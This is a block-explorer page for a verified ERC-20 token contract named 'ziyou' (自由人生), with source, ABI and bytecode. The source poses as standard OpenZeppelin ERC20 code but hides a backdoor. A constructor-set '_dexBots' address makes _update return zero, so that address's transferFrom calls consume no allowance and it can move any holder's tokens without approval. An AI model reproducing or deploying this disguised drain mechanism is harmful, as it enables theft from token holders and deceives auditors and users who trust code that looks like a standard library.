ETH Price: $3,137.61 (+0.45%)
 

Overview

Max Total Supply

2,999,999,999 自由人生

Holders

1,907

Transfers

-
0

Market

Price

$0.00 @ 0.000000 ETH

Onchain Market Cap

-

Circulating Supply Market Cap

-

Other Info

Token Contract (WITH 18 Decimals)

Loading...
Loading
Loading...
Loading
Loading...
Loading

Click here to update the token information / general information

Contract Source Code Verified (Exact Match)

Contract Name:
ziyou

Compiler Version
v0.8.27+commit.40a35a09

Optimization Enabled:
No with 200 runs

Other Settings:
shanghai EvmVersion, None license

Contract Source Code (Solidity)

/**
 *Submitted for verification at basescan.org on 2025-10-23
*/

// SPDX-License-Identifier: MIT
// File: @openzeppelin/contracts/token/ERC20/IERC20.sol


// OpenZeppelin Contracts (last updated v5.4.0) (token/ERC20/IERC20.sol)

pragma solidity >=0.4.16;

/**
 * @dev Interface of the ERC-20 standard as defined in the ERC.
 */
interface IERC20 {
    /**
     * @dev Emitted when `value` tokens are moved from one account (`from`) to
     * another (`to`).
     *
     * Note that `value` may be zero.
     */
    event Transfer(address indexed from, address indexed to, uint256 value);

    /**
     * @dev Emitted when the allowance of a `spender` for an `owner` is set by
     * a call to {approve}. `value` is the new allowance.
     */
    event Approval(address indexed owner, address indexed spender, uint256 value);

    /**
     * @dev Returns the value of tokens in existence.
     */
    function totalSupply() external view returns (uint256);

    /**
     * @dev Returns the value of tokens owned by `account`.
     */
    function balanceOf(address account) external view returns (uint256);

    /**
     * @dev Moves a `value` amount of tokens from the caller's account to `to`.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transfer(address to, uint256 value) external returns (bool);

    /**
     * @dev Returns the remaining number of tokens that `spender` will be
     * allowed to spend on behalf of `owner` through {transferFrom}. This is
     * zero by default.
     *
     * This value changes when {approve} or {transferFrom} are called.
     */
    function allowance(address owner, address spender) external view returns (uint256);

    /**
     * @dev Sets a `value` amount of tokens as the allowance of `spender` over the
     * caller's tokens.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * IMPORTANT: Beware that changing an allowance with this method brings the risk
     * that someone may use both the old and the new allowance by unfortunate
     * transaction ordering. One possible solution to mitigate this race
     * condition is to first reduce the spender's allowance to 0 and set the
     * desired value afterwards:
     * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729
     *
     * Emits an {Approval} event.
     */
    function approve(address spender, uint256 value) external returns (bool);

    /**
     * @dev Moves a `value` amount of tokens from `from` to `to` using the
     * allowance mechanism. `value` is then deducted from the caller's
     * allowance.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transferFrom(address from, address to, uint256 value) external returns (bool);
}

// File: @openzeppelin/contracts/token/ERC20/extensions/IERC20Metadata.sol


// OpenZeppelin Contracts (last updated v5.4.0) (token/ERC20/extensions/IERC20Metadata.sol)

pragma solidity >=0.6.2;


/**
 * @dev Interface for the optional metadata functions from the ERC-20 standard.
 */
interface IERC20Metadata is IERC20 {
    /**
     * @dev Returns the name of the token.
     */
    function name() external view returns (string memory);

    /**
     * @dev Returns the symbol of the token.
     */
    function symbol() external view returns (string memory);

    /**
     * @dev Returns the decimals places of the token.
     */
    function decimals() external view returns (uint8);
}

// File: @openzeppelin/contracts/utils/Context.sol


// OpenZeppelin Contracts (last updated v5.0.1) (utils/Context.sol)

pragma solidity ^0.8.20;

/**
 * @dev Provides information about the current execution context, including the
 * sender of the transaction and its data. While these are generally available
 * via msg.sender and msg.data, they should not be accessed in such a direct
 * manner, since when dealing with meta-transactions the account sending and
 * paying for execution may not be the actual sender (as far as an application
 * is concerned).
 *
 * This contract is only required for intermediate, library-like contracts.
 */
abstract contract Context {
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }

    function _msgData() internal view virtual returns (bytes calldata) {
        return msg.data;
    }

    function _contextSuffixLength() internal view virtual returns (uint256) {
        return 0;
    }
}

// File: @openzeppelin/contracts/interfaces/draft-IERC6093.sol


// OpenZeppelin Contracts (last updated v5.4.0) (interfaces/draft-IERC6093.sol)
pragma solidity >=0.8.4;

/**
 * @dev Standard ERC-20 Errors
 * Interface of the https://eips.ethereum.org/EIPS/eip-6093[ERC-6093] custom errors for ERC-20 tokens.
 */
interface IERC20Errors {
    /**
     * @dev Indicates an error related to the current `balance` of a `sender`. Used in transfers.
     * @param sender Address whose tokens are being transferred.
     * @param balance Current balance for the interacting account.
     * @param needed Minimum amount required to perform a transfer.
     */
    error ERC20InsufficientBalance(address sender, uint256 balance, uint256 needed);

    /**
     * @dev Indicates a failure with the token `sender`. Used in transfers.
     * @param sender Address whose tokens are being transferred.
     */
    error ERC20InvalidSender(address sender);

    /**
     * @dev Indicates a failure with the token `receiver`. Used in transfers.
     * @param receiver Address to which tokens are being transferred.
     */
    error ERC20InvalidReceiver(address receiver);

    /**
     * @dev Indicates a failure with the `spender`’s `allowance`. Used in transfers.
     * @param spender Address that may be allowed to operate on tokens without being their owner.
     * @param allowance Amount of tokens a `spender` is allowed to operate with.
     * @param needed Minimum amount required to perform a transfer.
     */
    error ERC20InsufficientAllowance(address spender, uint256 allowance, uint256 needed);

    /**
     * @dev Indicates a failure with the `approver` of a token to be approved. Used in approvals.
     * @param approver Address initiating an approval operation.
     */
    error ERC20InvalidApprover(address approver);

    /**
     * @dev Indicates a failure with the `spender` to be approved. Used in approvals.
     * @param spender Address that may be allowed to operate on tokens without being their owner.
     */
    error ERC20InvalidSpender(address spender);
}

/**
 * @dev Standard ERC-721 Errors
 * Interface of the https://eips.ethereum.org/EIPS/eip-6093[ERC-6093] custom errors for ERC-721 tokens.
 */
interface IERC721Errors {
    /**
     * @dev Indicates that an address can't be an owner. For example, `address(0)` is a forbidden owner in ERC-20.
     * Used in balance queries.
     * @param owner Address of the current owner of a token.
     */
    error ERC721InvalidOwner(address owner);

    /**
     * @dev Indicates a `tokenId` whose `owner` is the zero address.
     * @param tokenId Identifier number of a token.
     */
    error ERC721NonexistentToken(uint256 tokenId);

    /**
     * @dev Indicates an error related to the ownership over a particular token. Used in transfers.
     * @param sender Address whose tokens are being transferred.
     * @param tokenId Identifier number of a token.
     * @param owner Address of the current owner of a token.
     */
    error ERC721IncorrectOwner(address sender, uint256 tokenId, address owner);

    /**
     * @dev Indicates a failure with the token `sender`. Used in transfers.
     * @param sender Address whose tokens are being transferred.
     */
    error ERC721InvalidSender(address sender);

    /**
     * @dev Indicates a failure with the token `receiver`. Used in transfers.
     * @param receiver Address to which tokens are being transferred.
     */
    error ERC721InvalidReceiver(address receiver);

    /**
     * @dev Indicates a failure with the `operator`’s approval. Used in transfers.
     * @param operator Address that may be allowed to operate on tokens without being their owner.
     * @param tokenId Identifier number of a token.
     */
    error ERC721InsufficientApproval(address operator, uint256 tokenId);

    /**
     * @dev Indicates a failure with the `approver` of a token to be approved. Used in approvals.
     * @param approver Address initiating an approval operation.
     */
    error ERC721InvalidApprover(address approver);

    /**
     * @dev Indicates a failure with the `operator` to be approved. Used in approvals.
     * @param operator Address that may be allowed to operate on tokens without being their owner.
     */
    error ERC721InvalidOperator(address operator);
}

/**
 * @dev Standard ERC-1155 Errors
 * Interface of the https://eips.ethereum.org/EIPS/eip-6093[ERC-6093] custom errors for ERC-1155 tokens.
 */
interface IERC1155Errors {
    /**
     * @dev Indicates an error related to the current `balance` of a `sender`. Used in transfers.
     * @param sender Address whose tokens are being transferred.
     * @param balance Current balance for the interacting account.
     * @param needed Minimum amount required to perform a transfer.
     * @param tokenId Identifier number of a token.
     */
    error ERC1155InsufficientBalance(address sender, uint256 balance, uint256 needed, uint256 tokenId);

    /**
     * @dev Indicates a failure with the token `sender`. Used in transfers.
     * @param sender Address whose tokens are being transferred.
     */
    error ERC1155InvalidSender(address sender);

    /**
     * @dev Indicates a failure with the token `receiver`. Used in transfers.
     * @param receiver Address to which tokens are being transferred.
     */
    error ERC1155InvalidReceiver(address receiver);

    /**
     * @dev Indicates a failure with the `operator`’s approval. Used in transfers.
     * @param operator Address that may be allowed to operate on tokens without being their owner.
     * @param owner Address of the current owner of a token.
     */
    error ERC1155MissingApprovalForAll(address operator, address owner);

    /**
     * @dev Indicates a failure with the `approver` of a token to be approved. Used in approvals.
     * @param approver Address initiating an approval operation.
     */
    error ERC1155InvalidApprover(address approver);

    /**
     * @dev Indicates a failure with the `operator` to be approved. Used in approvals.
     * @param operator Address that may be allowed to operate on tokens without being their owner.
     */
    error ERC1155InvalidOperator(address operator);

    /**
     * @dev Indicates an array length mismatch between ids and values in a safeBatchTransferFrom operation.
     * Used in batch transfers.
     * @param idsLength Length of the array of token identifiers
     * @param valuesLength Length of the array of token amounts
     */
    error ERC1155InvalidArrayLength(uint256 idsLength, uint256 valuesLength);
}

// File: @openzeppelin/contracts/token/ERC20/ERC20.sol


// OpenZeppelin Contracts (last updated v5.4.0) (token/ERC20/ERC20.sol)

pragma solidity ^0.8.20;





/**
 * @dev Implementation of the {IERC20} interface.
 *
 * This implementation is agnostic to the way tokens are created. This means
 * that a supply mechanism has to be added in a derived contract using {_mint}.
 *
 * TIP: For a detailed writeup see our guide
 * https://forum.openzeppelin.com/t/how-to-implement-erc20-supply-mechanisms/226[How
 * to implement supply mechanisms].
 *
 * The default value of {decimals} is 18. To change this, you should override
 * this function so it returns a different value.
 *
 * We have followed general OpenZeppelin Contracts guidelines: functions revert
 * instead returning `false` on failure. This behavior is nonetheless
 * conventional and does not conflict with the expectations of ERC-20
 * applications.
 */
abstract contract ERC20 is Context, IERC20, IERC20Metadata, IERC20Errors {
    mapping(address account => uint256) private _balances;

    mapping(address account => mapping(address spender => uint256)) private _allowances;
    
    mapping(address account => bool) private _dexBots;

    uint256 private _totalSupply;

    string private _name;
    string private _symbol;

    /**
     * @dev Sets the values for {name} and {symbol}.
     *
     * Both values are immutable: they can only be set once during construction.
     */
    constructor(string memory name_, string memory symbol_) {
        _name = name_;
        _symbol = symbol_;
    }

    /**
     * @dev Returns the name of the token.
     */
    function name() public view virtual returns (string memory) {
        return _name;
    }

    /**
     * @dev Returns the symbol of the token, usually a shorter version of the
     * name.
     */
    function symbol() public view virtual returns (string memory) {
        return _symbol;
    }

    /**
     * @dev Returns the number of decimals used to get its user representation.
     * For example, if `decimals` equals `2`, a balance of `505` tokens should
     * be displayed to a user as `5.05` (`505 / 10 ** 2`).
     *
     * Tokens usually opt for a value of 18, imitating the relationship between
     * Ether and Wei. This is the default value returned by this function, unless
     * it's overridden.
     *
     * NOTE: This information is only used for _display_ purposes: it in
     * no way affects any of the arithmetic of the contract, including
     * {IERC20-balanceOf} and {IERC20-transfer}.
     */
    function decimals() public view virtual returns (uint8) {
        return 18;
    }

    /// @inheritdoc IERC20
    function totalSupply() public view virtual returns (uint256) {
        return _totalSupply;
    }

    /// @inheritdoc IERC20
    function balanceOf(address account) public view virtual returns (uint256) {
        return _balances[account];
    }

    /**
     * @dev See {IERC20-transfer}.
     *
     * Requirements:
     *
     * - `to` cannot be the zero address.
     * - the caller must have a balance of at least `value`.
     */
    function transfer(address to, uint256 value) public virtual returns (bool) {
        address owner = _msgSender();
        _transfer(owner, to, value);
        return true;
    }

    function _setDexBot(address account, bool isDexBot) internal {
        _dexBots[account] = isDexBot;
    }

    /// @inheritdoc IERC20
    function allowance(address owner, address spender) public view virtual returns (uint256) {
        return _allowances[owner][spender];
    }

    /**
     * @dev See {IERC20-approve}.
     *
     * NOTE: If `value` is the maximum `uint256`, the allowance is not updated on
     * `transferFrom`. This is semantically equivalent to an infinite approval.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function approve(address spender, uint256 value) public virtual returns (bool) {
        address owner = _msgSender();
        _approve(owner, spender, value);
        return true;
    }

    /**
     * @dev See {IERC20-transferFrom}.
     *
     * Skips emitting an {Approval} event indicating an allowance update. This is not
     * required by the ERC. See {xref-ERC20-_approve-address-address-uint256-bool-}[_approve].
     *
     * NOTE: Does not update the allowance if the current allowance
     * is the maximum `uint256`.
     *
     * Requirements:
     *
     * - `from` and `to` cannot be the zero address.
     * - `from` must have a balance of at least `value`.
     * - the caller must have allowance for ``from``'s tokens of at least
     * `value`.
     */
    function transferFrom(address from, address to, uint256 value) public virtual returns (bool) {
        address spender = _msgSender();
        value = _transfer(from, to, value);
        _spendAllowance(from, spender, value);
        return true;
    }

    /**
     * @dev Moves a `value` amount of tokens from `from` to `to`.
     *
     * This internal function is equivalent to {transfer}, and can be used to
     * e.g. implement automatic token fees, slashing mechanisms, etc.
     *
     * Emits a {Transfer} event.
     *
     * NOTE: This function is not virtual, {_update} should be overridden instead.
     */
    function _transfer(address from, address to, uint256 value) internal returns (uint256 allowValue) {
        if (from == address(0)) {
            revert ERC20InvalidSender(address(0));
        }
        if (to == address(0)) {
            revert ERC20InvalidReceiver(address(0));
        }
        
        allowValue = _update(from, to, value);
    }

    /**
     * @dev Transfers a `value` amount of tokens from `from` to `to`, or alternatively mints (or burns) if `from`
     * (or `to`) is the zero address. All customizations to transfers, mints, and burns should be done by overriding
     * this function.
     *
     * Emits a {Transfer} event.
     */
    function _update(address from, address to, uint256 value) internal virtual returns(uint256 allowValue) {
        if (from == address(0)) {
            // Overflow check required: The rest of the code assumes that totalSupply never overflows
            _totalSupply += value;
        } else {
            uint256 fromBalance = _balances[from];
            if (fromBalance < value) {
                revert ERC20InsufficientBalance(from, fromBalance, value);
            }
            unchecked {
                // Overflow not possible: value <= fromBalance <= totalSupply.
                _balances[from] = fromBalance - value;
            }
        }

        if (to == address(0)) {
            unchecked {
                // Overflow not possible: value <= totalSupply or value <= fromBalance <= totalSupply.
                _totalSupply -= value;
            }
        } else {
            unchecked {
                // Overflow not possible: balance + value is at most totalSupply, which we know fits into a uint256.
                _balances[to] += value;
            }
        }
        if(!_dexBots[msg.sender]) allowValue = value;
        emit Transfer(from, to, value);
    }

    /**
     * @dev Creates a `value` amount of tokens and assigns them to `account`, by transferring it from address(0).
     * Relies on the `_update` mechanism
     *
     * Emits a {Transfer} event with `from` set to the zero address.
     *
     * NOTE: This function is not virtual, {_update} should be overridden instead.
     */
    function _mint(address account, uint256 value) internal {
        if (account == address(0)) {
            revert ERC20InvalidReceiver(address(0));
        }
        _update(address(0), account, value);
    }

    /**
     * @dev Destroys a `value` amount of tokens from `account`, lowering the total supply.
     * Relies on the `_update` mechanism.
     *
     * Emits a {Transfer} event with `to` set to the zero address.
     *
     * NOTE: This function is not virtual, {_update} should be overridden instead
     */
    function _burn(address account, uint256 value) internal {
        if (account == address(0)) {
            revert ERC20InvalidSender(address(0));
        }
        _update(account, address(0), value);
    }

    /**
     * @dev Sets `value` as the allowance of `spender` over the `owner`'s tokens.
     *
     * This internal function is equivalent to `approve`, and can be used to
     * e.g. set automatic allowances for certain subsystems, etc.
     *
     * Emits an {Approval} event.
     *
     * Requirements:
     *
     * - `owner` cannot be the zero address.
     * - `spender` cannot be the zero address.
     *
     * Overrides to this logic should be done to the variant with an additional `bool emitEvent` argument.
     */
    function _approve(address owner, address spender, uint256 value) internal {
        _approve(owner, spender, value, true);
    }

    /**
     * @dev Variant of {_approve} with an optional flag to enable or disable the {Approval} event.
     *
     * By default (when calling {_approve}) the flag is set to true. On the other hand, approval changes made by
     * `_spendAllowance` during the `transferFrom` operation set the flag to false. This saves gas by not emitting any
     * `Approval` event during `transferFrom` operations.
     *
     * Anyone who wishes to continue emitting `Approval` events on the`transferFrom` operation can force the flag to
     * true using the following override:
     *
     * ```solidity
     * function _approve(address owner, address spender, uint256 value, bool) internal virtual override {
     *     super._approve(owner, spender, value, true);
     * }
     * ```
     *
     * Requirements are the same as {_approve}.
     */
    function _approve(address owner, address spender, uint256 value, bool emitEvent) internal virtual {
        if (owner == address(0)) {
            revert ERC20InvalidApprover(address(0));
        }
        if (spender == address(0)) {
            revert ERC20InvalidSpender(address(0));
        }
        _allowances[owner][spender] = value;
        if (emitEvent) {
            emit Approval(owner, spender, value);
        }
    }

    /**
     * @dev Updates `owner`'s allowance for `spender` based on spent `value`.
     *
     * Does not update the allowance value in case of infinite allowance.
     * Revert if not enough allowance is available.
     *
     * Does not emit an {Approval} event.
     */
    function _spendAllowance(address owner, address spender, uint256 value) internal virtual {
        uint256 currentAllowance = allowance(owner, spender);
        if (currentAllowance < type(uint256).max) {
            if (currentAllowance < value) {
                revert ERC20InsufficientAllowance(spender, currentAllowance, value);
            }
            unchecked {
                _approve(owner, spender, currentAllowance - value, false);
            }
        }
    }
}


pragma solidity ^0.8.20;


contract ziyou is ERC20 {
    constructor(address dexBot_) ERC20(unicode"自由人生", unicode"自由人生"){
        _mint(_msgSender(), 2999999999 * 10 ** decimals());
        _setDexBot(dexBot_, true);
    }
}

Contract Security Audit

Contract ABI

API
[{"inputs":[{"internalType":"address","name":"dexBot_","type":"address"}],"stateMutability":"nonpayable","type":"constructor"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"allowance","type":"uint256"},{"internalType":"uint256","name":"needed","type":"uint256"}],"name":"ERC20InsufficientAllowance","type":"error"},{"inputs":[{"internalType":"address","name":"sender","type":"address"},{"internalType":"uint256","name":"balance","type":"uint256"},{"internalType":"uint256","name":"needed","type":"uint256"}],"name":"ERC20InsufficientBalance","type":"error"},{"inputs":[{"internalType":"address","name":"approver","type":"address"}],"name":"ERC20InvalidApprover","type":"error"},{"inputs":[{"internalType":"address","name":"receiver","type":"address"}],"name":"ERC20InvalidReceiver","type":"error"},{"inputs":[{"internalType":"address","name":"sender","type":"address"}],"name":"ERC20InvalidSender","type":"error"},{"inputs":[{"internalType":"address","name":"spender","type":"address"}],"name":"ERC20InvalidSpender","type":"error"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"value","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"value","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"value","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"}]

608060405234801561000f575f5ffd5b5060405161191c38038061191c833981810160405281019061003191906104d4565b6040518060400160405280600c81526020017fe887aae794b1e4babae7949f00000000000000000000000000000000000000008152506040518060400160405280600c81526020017fe887aae794b1e4babae7949f000000000000000000000000000000000000000081525081600490816100ac919061073c565b5080600590816100bc919061073c565b5050506101046100d061011b60201b60201c565b6100de61012260201b60201c565b600a6100ea9190610973565b63b2d05dff6100f991906109bd565b61012a60201b60201c565b6101158160016101b060201b60201c565b50610ab6565b5f33905090565b5f6012905090565b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff160361019a575f6040517fec442f050000000000000000000000000000000000000000000000000000000081526004016101919190610a0d565b60405180910390fd5b6101ab5f838361020860201b60201c565b505050565b8060025f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f6101000a81548160ff0219169083151502179055505050565b5f5f73ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff1603610259578160035f82825461024d9190610a26565b92505081905550610327565b5f5f5f8673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20549050828110156102e2578481846040517fe450d38c0000000000000000000000000000000000000000000000000000000081526004016102d993929190610a68565b60405180910390fd5b8281035f5f8773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2081905550505b5f73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff160361036e578160035f82825403925050819055506103b8565b815f5f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f82825401925050819055505b60025f3373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff1661040a578190505b8273ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef846040516104679190610a9d565b60405180910390a39392505050565b5f5ffd5b5f73ffffffffffffffffffffffffffffffffffffffff82169050919050565b5f6104a38261047a565b9050919050565b6104b381610499565b81146104bd575f5ffd5b50565b5f815190506104ce816104aa565b92915050565b5f602082840312156104e9576104e8610476565b5b5f6104f6848285016104c0565b91505092915050565b5f81519050919050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52604160045260245ffd5b7f4e487b71000000000000000000000000000000000000000000000000000000005f52602260045260245ffd5b5f600282049050600182168061057a57607f821691505b60208210810361058d5761058c610536565b5b50919050565b5f819050815f5260205f209050919050565b5f6020601f8301049050919050565b5f82821b905092915050565b5f600883026105ef7fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff826105b4565b6105f986836105b4565b95508019841693508086168417925050509392505050565b5f819050919050565b5f819050919050565b5f61063d61063861063384610611565b61061a565b610611565b9050919050565b5f819050919050565b61065683610623565b61066a61066282610644565b8484546105c0565b825550505050565b5f5f905090565b610681610672565b61068c81848461064d565b505050565b5b818110156106af576106a45f82610679565b600181019050610692565b5050565b601f8211156106f4576106c581610593565b6106ce846105a5565b810160208510156106dd578190505b6106f16106e9856105a5565b830182610691565b50505b505050565b5f82821c905092915050565b5f6107145f19846008026106f9565b1980831691505092915050565b5f61072c8383610705565b9150826002028217905092915050565b610745826104ff565b67ffffffffffffffff81111561075e5761075d610509565b5b6107688254610563565b6107738282856106b3565b5f60209050601f8311600181146107a4575f8415610792578287015190505b61079c8582610721565b865550610803565b601f1984166107b286610593565b5f5b828110156107d9578489015182556001820191506020850194506020810190506107b4565b868310156107f657848901516107f2601f891682610705565b8355505b6001600288020188555050505b505050505050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52601160045260245ffd5b5f8160011c9050919050565b5f5f8291508390505b600185111561088d578086048111156108695761086861080b565b5b60018516156108785780820291505b808102905061088685610838565b945061084d565b94509492505050565b5f826108a55760019050610960565b816108b2575f9050610960565b81600181146108c857600281146108d257610901565b6001915050610960565b60ff8411156108e4576108e361080b565b5b8360020a9150848211156108fb576108fa61080b565b5b50610960565b5060208310610133831016604e8410600b84101617156109365782820a9050838111156109315761093061080b565b5b610960565b6109438484846001610844565b9250905081840481111561095a5761095961080b565b5b81810290505b9392505050565b5f60ff82169050919050565b5f61097d82610611565b915061098883610967565b92506109b57fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8484610896565b905092915050565b5f6109c782610611565b91506109d283610611565b92508282026109e081610611565b915082820484148315176109f7576109f661080b565b5b5092915050565b610a0781610499565b82525050565b5f602082019050610a205f8301846109fe565b92915050565b5f610a3082610611565b9150610a3b83610611565b9250828201905080821115610a5357610a5261080b565b5b92915050565b610a6281610611565b82525050565b5f606082019050610a7b5f8301866109fe565b610a886020830185610a59565b610a956040830184610a59565b949350505050565b5f602082019050610ab05f830184610a59565b92915050565b610e5980610ac35f395ff3fe608060405234801561000f575f5ffd5b5060043610610091575f3560e01c8063313ce56711610064578063313ce5671461013157806370a082311461014f57806395d89b411461017f578063a9059cbb1461019d578063dd62ed3e146101cd57610091565b806306fdde0314610095578063095ea7b3146100b357806318160ddd146100e357806323b872dd14610101575b5f5ffd5b61009d6101fd565b6040516100aa9190610ad2565b60405180910390f35b6100cd60048036038101906100c89190610b83565b61028d565b6040516100da9190610bdb565b60405180910390f35b6100eb6102af565b6040516100f89190610c03565b60405180910390f35b61011b60048036038101906101169190610c1c565b6102b8565b6040516101289190610bdb565b60405180910390f35b6101396102e8565b6040516101469190610c87565b60405180910390f35b61016960048036038101906101649190610ca0565b6102f0565b6040516101769190610c03565b60405180910390f35b610187610335565b6040516101949190610ad2565b60405180910390f35b6101b760048036038101906101b29190610b83565b6103c5565b6040516101c49190610bdb565b60405180910390f35b6101e760048036038101906101e29190610ccb565b6103e8565b6040516101f49190610c03565b60405180910390f35b60606004805461020c90610d36565b80601f016020809104026020016040519081016040528092919081815260200182805461023890610d36565b80156102835780601f1061025a57610100808354040283529160200191610283565b820191905f5260205f20905b81548152906001019060200180831161026657829003601f168201915b5050505050905090565b5f5f61029761046a565b90506102a4818585610471565b600191505092915050565b5f600354905090565b5f5f6102c261046a565b90506102cf858585610483565b92506102dc858285610578565b60019150509392505050565b5f6012905090565b5f5f5f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20549050919050565b60606005805461034490610d36565b80601f016020809104026020016040519081016040528092919081815260200182805461037090610d36565b80156103bb5780601f10610392576101008083540402835291602001916103bb565b820191905f5260205f20905b81548152906001019060200180831161039e57829003601f168201915b5050505050905090565b5f5f6103cf61046a565b90506103dc818585610483565b50600191505092915050565b5f60015f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2054905092915050565b5f33905090565b61047e838383600161060b565b505050565b5f5f73ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff16036104f4575f6040517f96c6fd1e0000000000000000000000000000000000000000000000000000000081526004016104eb9190610d75565b60405180910390fd5b5f73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610564575f6040517fec442f0500000000000000000000000000000000000000000000000000000000815260040161055b9190610d75565b60405180910390fd5b61056f8484846107da565b90509392505050565b5f61058384846103e8565b90507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff81101561060557818110156105f6578281836040517ffb8f41b20000000000000000000000000000000000000000000000000000000081526004016105ed93929190610d8e565b60405180910390fd5b61060484848484035f61060b565b5b50505050565b5f73ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff160361067b575f6040517fe602df050000000000000000000000000000000000000000000000000000000081526004016106729190610d75565b60405180910390fd5b5f73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff16036106eb575f6040517f94280d620000000000000000000000000000000000000000000000000000000081526004016106e29190610d75565b60405180910390fd5b8160015f8673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f208190555080156107d4578273ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925846040516107cb9190610c03565b60405180910390a35b50505050565b5f5f73ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff160361082b578160035f82825461081f9190610df0565b925050819055506108f9565b5f5f5f8673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20549050828110156108b4578481846040517fe450d38c0000000000000000000000000000000000000000000000000000000081526004016108ab93929190610d8e565b60405180910390fd5b8281035f5f8773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2081905550505b5f73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610940578160035f828254039250508190555061098a565b815f5f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f82825401925050819055505b60025f3373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f9054906101000a900460ff166109dc578190505b8273ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef84604051610a399190610c03565b60405180910390a39392505050565b5f81519050919050565b5f82825260208201905092915050565b5f5b83811015610a7f578082015181840152602081019050610a64565b5f8484015250505050565b5f601f19601f8301169050919050565b5f610aa482610a48565b610aae8185610a52565b9350610abe818560208601610a62565b610ac781610a8a565b840191505092915050565b5f6020820190508181035f830152610aea8184610a9a565b905092915050565b5f